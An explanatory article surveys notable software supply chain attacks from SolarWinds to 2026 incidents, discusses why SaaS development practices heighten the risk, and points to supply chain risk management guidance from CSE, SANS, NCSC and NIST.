Inside Supply Chain Attacks

Recent supply chain attacks

Supply chain attacks have made the headlines for a decade now, but we’ve been seeing them with increasing regularity. They involve malicious code embedded into trusted products, either hardware or software, which can then compromise the companies using those affected products. By targeting a single supplier, threat actors exploit the trusted relationship to get a foothold in many of their customers, potentially exposing thousands or sometimes millions of victims. The scale of the threat is staggering; here are just a few examples:

• Salt Typhoon (ongoing). A China state-sponsored threat actor dubbed Salt Typhoon was discovered to have compromised networks of major global telecommunications providers for several years as part of an extensive campaign of cyber espionage.
• Discovered in late 2020, Sunburst (CVE-2020-10148) was attributed to Russia’s foreign intelligence service (SVR) which compromised the development environment at SolarWinds, covertly embedding their own malicious code into a digitally signed Orion dll. The operation infected thousands of organizations, although only about 100 appear to have been specifically targeted, including Cisco and Microsoft, and the US Department of Defense and Treasury Department. The incident is described in detail by Wired (paywall), and by SolarWinds CEO Sudhakar Ramakrishna at RSA Conference 2021.
• In 2021, the REvil group exploited a vulnerability in Kaseya’s VSA and pushed malicious updates to its MSP customers. Over 1,500 businesses were impacted as a result.
• Log4J (CVE-2021-44228): A zero-day vulnerability discovered in late 2021 within Apache Log4j, an open-source Java logging library used by hundreds of millions of devices and web applications globally. The vulnerability received a threat score of 10 out of 10 (ie “Critical”) from the Common Vulnerability Scoring System (CVSS), requiring a massive global response to patch servers.
• MOVEit (CVE-2023-34362): A zero-day vulnerability in Progress Software’s MOVEit file transfer application allowed hackers to bypass authentication, access databases, and exfiltrate sensitive data from thousands of organizations globally.
• PowerSchool (2025): a massive data breach that took place in 2024 came to light in January 2025 in which a 19 year old stole the personal information of millions of students and teachers from PowerSchool. Although a reported US$2.85 million ransom was paid, the agreement wasn’t honored and in May 2025 some school boards received new ransom demands indicating that the data had never been destroyed as promised.
• Instructure Canvas (2026): This May 2026 data breach of Instructure’s Canvas Learning Management System (LMS) by ShinyHunters extortion group exploited weak identity controls in the “Free-For-Teacher” accounts, claiming to have stolen over 3.65 terabytes of data from thousands of schools and millions of individuals.
• More recently, early in 2026 TeamPCP has been targeting tools used by developers to plant malicious payloads in code used by thousands of companies. The particularly insidious aspect of their approach is that their dozens of attacks have included open-source security software such as the Trivy security scanner (CVE-2026-33634) and Checkmarx’ KICS, an Infrastructure as Code (IaC) tool for detecting misconfigurations and vulnerabilities before deployment.

These attacks illustrate the scale and logic behind supply chain attacks. One successful attack can potentially compromise the data of thousands of customers, or more. While the objectives of the attacks vary depending on the attacker and victim – from financial extortion to hacktivism to espionage – the implications can be severe. Open-source libraries have become targets because, as noted by the Ransom-ISAC team, “underfunded open-source package maintainers are the most efficient entry point into the supply chains of virtually every organization on earth.”

The problem

The move to cloud-based services over the last two decades has created a perfect storm for hackers. SaaS created with security as an afterthought has resulted in supply chains that have never been so vulnerable. “Move fast and break things” was reportedly the internal motto of Facebook (although it changed in 2014 to “move fast with stable infrastructure”), and this is clearly a call for functionality, not security. This is not at all surprising: the behavior and priorities of software developers follow the dollars of their customers. When’s the last time you heard a purchasing agent ask whether a SaaS offering implemented Secure by Design development principles?

What to do

Being aware of the risks of a supply chain attack is an important first step. Although some cyber attacks are sophisticated, many are quite basic and can be thwarted with some basic controls. Supply Chain Risk Management (SCRM) starts with a risk assessment to establish what assets need protection, what risks are posed by your suppliers, and what impact a security breach could have. This is then used to develop an appropriate strategy to minimize the impact of a supply chain breach.

The mitigation strategy is going to be unique to every organization based on its suppliers, customers, assets, etc., and its scope can vary accordingly. This means that, unfortunately, there’s no magic one-size-fits-all solution, so rather than provide a potentially misleading (or worse!) “Top 5 Things You Should Do To Protect Against Supply Chain Attacks” list, it’s suggested you review the links in the References section below. The good news is that by getting this far, you’ve already taken the first step.

References:

• CSE (Canada): Protecting your organization from software supply chain threats
• SANS: Securing the Supply Chain – A Hybrid Approach to Effective SCRM Policies and Procedures
• NCSC (UK): Cyber Essentials Supply Chain Playbook
• NIST: Defending Against Software Supply Chain Attacks